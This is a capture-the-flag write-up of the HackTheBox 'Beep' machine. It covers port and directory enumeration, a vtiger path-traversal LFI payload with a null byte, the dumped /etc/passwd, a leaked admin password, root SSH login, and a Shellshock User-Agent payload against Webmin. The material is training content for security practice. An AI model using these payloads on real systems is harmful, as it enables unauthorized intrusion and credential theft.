HackTheBox - Beep
Morten Hansen • January 30, 2022
Beep
IP 10.10.10.7
NMAP
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.3
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp open ssl/https?
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4445/tcp open upnotifyp?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com
Shows us a lot of open ports and searching the web-browsers points us to many web-sites. Run gobuster and we get some hits.
gobuster dir -u https://10.10.10.7 -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -x php,txt,html -b 403,404,302 -o enum/gobust -k
/.htaccess.html (Status: 403) [Size: 292]
/.htpasswd (Status: 403) [Size: 287]
/.htaccess (Status: 403) [Size: 287]
/.htpasswd.php (Status: 403) [Size: 291]
/.htaccess.php (Status: 403) [Size: 291]
/.htpasswd.txt (Status: 403) [Size: 291]
/.htaccess.txt (Status: 403) [Size: 291]
/.htpasswd.html (Status: 403) [Size: 292]
/admin (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/cgi-bin/.html (Status: 403) [Size: 291]
/cgi-bin/ (Status: 403) [Size: 286]
/configs (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
/config.php (Status: 200) [Size: 1785]
/favicon.ico (Status: 200) [Size: 894]
/help (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
/images (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
/index.php (Status: 200) [Size: 1785]
/lang (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
/libs (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]
/mail (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
/modules (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/panel (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
/recordings (Status: 301) [Size: 314] [--> https://10.10.10.7/recordings/]
/register.php (Status: 200) [Size: 1785]
/robots.txt (Status: 200) [Size: 28]
/robots.txt (Status: 200) [Size: 28]
/static (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
/themes (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
/var (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
/vtigercrm (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/]
Enumerating some of the folders we find services like freepbx at port 443, and webmin at port 10000. The folder /vtigercrm leads us to vtiger and after som researching we find an LFI-exploit.
By accessing the filepath https://10.10.10.7//vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=/../../../../../etc/asterisk/sip_additional.conf%00 we get to read local files at the victim server. Important to pick absolute filepaths with files we got permissions to read. Also need to append %00 (nullbyte) at the end of the path in order for the LFI to read files.
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
It is also possible to read files from the web-folder at /var/www/html/ and then search throught the folders found with gobuster. The folders inside does not give much information, so we can look after configuration-files (.config)from some of the installed services like FREEPBX.
#some config-files related to Elastix and PBX
/etc/amportal.conf
/etc/rc.local
/etc/zaptel.conf
/etc/fxotune.conf
/etc/asterisk/asterisk.conf
/etc/asterisk/cdr_mysql.conf
/etc/asterisk/enum.conf
/etc/asterisk/extensions.conf
/etc/asterisk/extensions_additional.conf
/etc/asterisk/extensions_custom.conf
/etc/asterisk/features.conf
/etc/asterisk/flite.conf
/etc/asterisk/iax.conf
/etc/asterisk/iax_additional.conf
/etc/asterisk/iax_custom.conf
/etc/asterisk/iax_custom_post.conf
/etc/asterisk/iax_general_additional.conf
/etc/asterisk/iax_general_custom.conf
/etc/asterisk/iax_registrations_custom.conf
/etc/asterisk/iax_registrations.conf
/etc/asterisk/indications.conf
/etc/asterisk/localprefixes.conf
/etc/asterisk/logger.conf
/etc/asterisk/manager.conf
/etc/asterisk/meetme.conf
/etc/asterisk/modem.conf
/etc/asterisk/modules.conf
/etc/asterisk/musiconhold.conf
/etc/asterisk/musiconhold_additional.conf
/etc/asterisk/musiconhold_custom.conf
/etc/asterisk/phone.conf
/etc/asterisk/phpagi.conf
/etc/asterisk/privacy.conf
/etc/asterisk/queues.conf
/etc/asterisk/rtp.conf
/etc/asterisk/sip.conf
/etc/asterisk/version
/etc/asterisk/voicemail.conf
/etc/asterisk/vm_email.inc
/etc/asterisk/vm_general.inc
/etc/asterisk/zapata.conf
/etc/asterisk/zapata-auto.conf
Some of the files contains information about usernames and passwords.
user: adminpassword: jEhdIekWmdjE
We try to SSH in to the server with usernames from the PASSWD-file but get an error-message.
ssh aterisk@10.10.10.7
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
We fix this with -oKexAlgorithms=+diffie-hellman-group1-sha1 in the command. After trying the users we get an root-shell when connecting as root and the password we found with the LFI.
TIP
Worth to check out
/proc/self/statuswhen enumerating with LFI. We can find group id and check in passwd to find what user we have.We can also use burp-suite and
intruderto run through wordlists looking for log/config-files. Then mark the url point we want to FUZZ (in the request) and pressaddto make it an variable we can FUZZ. The list we define under thepayloadstab. Thenstart attackand we can see if the requests are going through.
We then get the flags from /home/fanis/user.txt and /root.root.txt. (It is also possible to read out the user.txt with the LFI.)
It is also possible to get access by exploting a sh-script inside the /cgi-bin/-folder at port 10000. Gobuster against the folders to find script. Then use shellshock-exploit and get RCE.
#edit User-Agent in BurpSuite
User-Agent: () { :; }; sleep 10
